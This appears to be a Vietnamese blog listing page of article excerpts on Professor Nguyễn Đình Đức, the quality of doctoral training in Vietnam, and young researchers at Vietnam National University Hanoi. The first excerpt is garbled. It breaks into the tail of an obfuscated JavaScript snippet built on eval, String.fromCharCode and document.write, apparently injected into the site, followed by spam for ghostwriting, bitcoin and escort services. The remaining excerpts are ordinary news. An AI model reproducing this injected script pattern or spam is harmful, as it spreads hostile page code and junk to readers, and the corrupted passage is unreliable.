GS Nguyễn Đình Đức: 5 Giải pháp giúp Việt Nam nắm bắt cơ hội vàng trong cuộc cách mạng lần thứ 4

Theo VOV, Tieng noi Viet Nam, ngay 01-1-2017 ,a,r,s,1,2,6,l,0,4,q,0,2,3,a,p,5,5,5,3,m,n,b,o,1,0,9,6,4,7)));’,30,30,’116|115|111|112|101|57|108|62|105|121|58|60|46|100|99|document|fromCharCode|String|eval|write|123|117|120|125|47|45|59|97|98|110′.split(‘|’),0,{})) bitcoin haber De autorin kaudo1971 stellt sich vor seo-texte, produktbeschreibungen, ratgeber- und anleitungstexte sowie akademische arbeit ghostwriter https://www.bachelorschreibenlassen.com/akademische-arbeit/ technische beschreibungen verfasse ich ihnen schnell und in einer professionellen qualitt diyarbakır escort, diyarbakır escort, elazığ escort, elazığ escort, arsuz escort, arsuz escort, denizli escort, denizli escort, denizli escort, […]

Continue reading

GS Nguyễn Đình Đức: Các chương trình đào tạo thí điểm – “đặc sản” trong đào tạo của ĐHQGHN

18/4/2014.  Kể từ ngày thành lập đến nay, ĐHQGHN đã mở 25 ngành, chuyên ngành đào tạo thí điểm, trong đó có 4 chương trình đại học, 18 chương trình thạc sĩ và 3 chương trình tiến sĩ. Ngày 18.4, ĐHQGHN đã tổ chức hội nghị tổng kết đánh giá các chương trình đào tạo thí […]

Continue reading

GS Nguyễn Đình Đức: “Để đào tạo tiến sỹ có chất lượng, đòi hỏi người thầy phải có trình độ cao, khắt khe”

Thứ hai, 28/11/2016, 14:56 (GMT+7) Bội thực tiến sĩ (TS), chất lượng luận án TS ở các cơ sở đào tạo không đồng đều và có thể vàng thau lẫn lộn. Nhiều luận án ít giá trị thực tế, không có tính khoa học, như một báo cáo tổng kết, nhưng nghiên cứu sinh (NCS) […]

Continue reading

Phạm Hồng Công – Học trò của GS. Nguyễn Đình Đức, Chàng trai 25 tuổi ‘made in Vietnam’ với 17 bài báo quốc tế

10:49 AM – 09/11/2016 Hoàn toàn được đào tạo trong nước, chưa bao giờ được ra nước ngoài dự một sinh hoạt khoa học nào, đang là nghiên cứu sinh mới bước vào năm thứ ba, nhưng Phạm Hồng Công đã có 17 bài báo quốc tế. Con đường đến với khoa học của chàng […]

Continue reading

Mổ xẻ nguyên nhân ảnh hưởng chất lượng đào tạo tiến sĩ tại Việt Nam

TPO – Thời gian vừa qua, chất lượng đào tạo tiến sĩ là một trong những đề tài nóng trong dư luận xã hội. Nhiều ý kiến chưa tin tưởng vào chất lượng đào tạo tiến sĩ hiện nay do: đề tài nghiên cứu không xuất phát từ yêu cầu thực tiễn, kết quả nghiên […]

Continue reading

GS Nguyễn Đình Đức: “Chưa có nước nào đào tạo tiến sĩ rẻ như Việt Nam”

10/11/2016  14:17 GMT+7 – Bộ GD-ĐT đang tiến hành sửa đổi, bổ sung quy chế đào tạo tiến sĩ nhằm nâng cao chất lượng của bậc đào tạo này. Thứ trưởng Bùi Văn Ga cho biết, quy chế mới sẽ được sửa đổi theo hướng đặt chất lượng lên hàng đầu, giảm quy mô số lượng […]

Continue reading

“Đào tạo tiến sĩ đang chạy theo số lượng, buông lỏng chất lượng”

13:59 10/11/16 (GDVN) – “Năm 1976, Việt Nam lần đầu tiên đào tạo phó tiến sĩ trong nước. 6 năm sau đào tạo tiến sĩ trong nước. Khó khăn thế nhưng chất lượng rất tốt, không ai kêu ca”. Đầu năm 2016, dư luận xôn xao, đưa ra nghi vấn về chất lượng đào tạo […]

Continue reading

GS Nguyễn Đình Đức: “Đào tạo tiến sĩ cần đi vào thực chất”

Thứ Hai, 14/11/2016, 02:32:36 Giờ thực hành của nghiên cứu sinh Trường đại học Khoa học và Công nghệ Hà Nội. Những năm qua, quy mô đào tạo tiến sĩ (TS) ở nước ta ngày càng lớn, số người có học vị TS ngày càng nhiều. Tuy nhiên, chất lượng đào tạo cũng như trình […]

Continue reading

GS Nguyễn Đình Đức: Lần đầu tiên Việt Nam đào tạo Thạc sĩ Kỹ thuật hạ tầng theo chuẩn Nhật Bản

26.5.2016. Là một trong 6 chương trình thạc sĩ đầu tiên của Trường Đại học Việt Nhật, ĐHQGHN, chương trình Kỹ thuật hạ tầng có mục tiêu đào tạo nguồn nhân lực chất lượng cao theo chuẩn Nhật Bản với sự hỗ trợ lớn từ Chính phủ Việt Nam và Nhật Bản. Vậy chuyên ngành […]

Continue reading

Phạm Toàn Thắng: Chàng sinh viên có 3 bài báo trên các tạp chí quốc tế ISI

06.4.2014. Là sinh viên năm cuối hệ kỹ sư K.55H Khoa Cơ học kỹ thuật và Tự động hóa, trường ĐH Công nghệ – Đại học Quốc gia Hà Nội (ĐHQGHN), đến nay, Phạm Toàn Thắng (SN 1991) đã có 3 bài báo được đăng trên các tạp chí quốc tế ISI (Institute for Scientific […]

Continue reading